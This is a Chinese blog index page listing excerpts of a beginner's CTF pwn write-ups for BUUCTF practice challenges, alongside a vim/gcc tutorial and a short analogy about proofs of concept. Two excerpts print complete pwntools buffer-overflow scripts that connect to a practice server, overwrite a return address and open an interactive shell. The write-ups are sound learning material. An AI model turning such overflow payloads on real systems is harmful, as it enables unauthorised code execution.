摘要: gets() ebp-38h ==> 0x38 * 'a' 选择a1 a2 按H键 当a1 0x30.....等于a2 0x1957...时if循环进行 'a'*offset + 'ebp' + get_flag + get_flag的返回地址 + 参数a1 + 参数a2 知识点: 1.exit函数 阅读全文
posted @ 2022-07-04 19:13 lypp冲冲冲 阅读(38) 评论(0) 推荐(0)
摘要: 今天看到一个很有意思的比喻: 想象自己是一个特工,你的目标是监控一个重要的人,有一天你怀疑目标家里的窗子可能没有关,于是你上前推了推,结果推开了,这是一个POC。之后你回去了,开始准备第二天的渗透计划,第二天你通过同样的漏洞渗透进了它家,仔细查看了所有的重要文件,离开时还安装了一个隐蔽的窃听气,这一 阅读全文
posted @ 2022-05-12 21:02 lypp冲冲冲 阅读(62) 评论(0) 推荐(0)
摘要: 64字节小端序 拖进idea 连靶机 得到flag 搜索 复制 阅读全文
posted @ 2022-05-07 23:34 lypp冲冲冲 阅读(34) 评论(0) 推荐(0)
摘要: 64位 小端序 拖进idea 距离 rbp 有 Fh, 转化为十进制是15;即会碰到底层的栈的位置 main->(int fun) 写脚本 cat flag 搜索 复制 阅读全文
posted @ 2022-05-07 23:34 lypp冲冲冲 阅读(26) 评论(0) 推荐(0)
摘要: warmup_csaw_2016 查出:64字节小端序 距离栈底40h (+8)转化为十进制 是 72 写脚本 搜索 复制 阅读全文
posted @ 2022-05-07 23:33 lypp冲冲冲 阅读(55) 评论(0) 推荐(0)
摘要: from pwn import * p=remote('node4.buuoj.cn',25554) payload = 'I'*20+'aaaa'+ p32(0x8048f0d) p.sendline(payload) p.interactive() 搜索 复制 阅读全文
posted @ 2022-05-07 23:32 lypp冲冲冲 阅读(30) 评论(0) 推荐(0)
摘要: 64位 小端序,拖入ida 上python from pwn import *io=remote('node4.buuoj.cn',26758)payload='A'*136+p64(0x400596)io.sendline(payload)io.interactive() flag出来了 搜索 复 阅读全文
posted @ 2022-05-07 23:31 lypp冲冲冲 阅读(540) 评论(0) 推荐(0)
摘要: Linux常用的编辑工具vim 1.编写C语言文件(以hello文件为例 .c后缀) 启动vim 命名新文件hello Enter 进入编辑界面 输入i 开始编辑 编写完成 esc键 输入 :wq enter 保存文件 退出编辑模式 编译hello.c gcc -o hello hello.c ./ 阅读全文
posted @ 2022-05-07 23:29 lypp冲冲冲 阅读(77) 评论(0) 推荐(0)
摘要: 今天来记录一下shellcode的新题 管他三七二十一常规操作 哦买噶竟然给开了 NX保护 但是莫慌莫慌 继续 看看逻辑找破绽 发现了什么1.出现了mmap函数就去查 2.有判断条件就顺下去找漏洞 好的进去找,看看看看这不就是逻辑吗pwn他pwn他 在里面循环判断判断 但是判断一下发现 重点是啥么, 阅读全文
posted @ 2022-05-07 23:28 lypp冲冲冲 阅读(218) 评论(0) 推荐(0)
摘要: 是吧!要进入博客园了!自己的新的开始!感谢帮助我的宝儿们 阅读全文
posted @ 2022-03-07 12:28 lypp冲冲冲 阅读(63) 评论(0) 推荐(0)
/*每日诗词上*/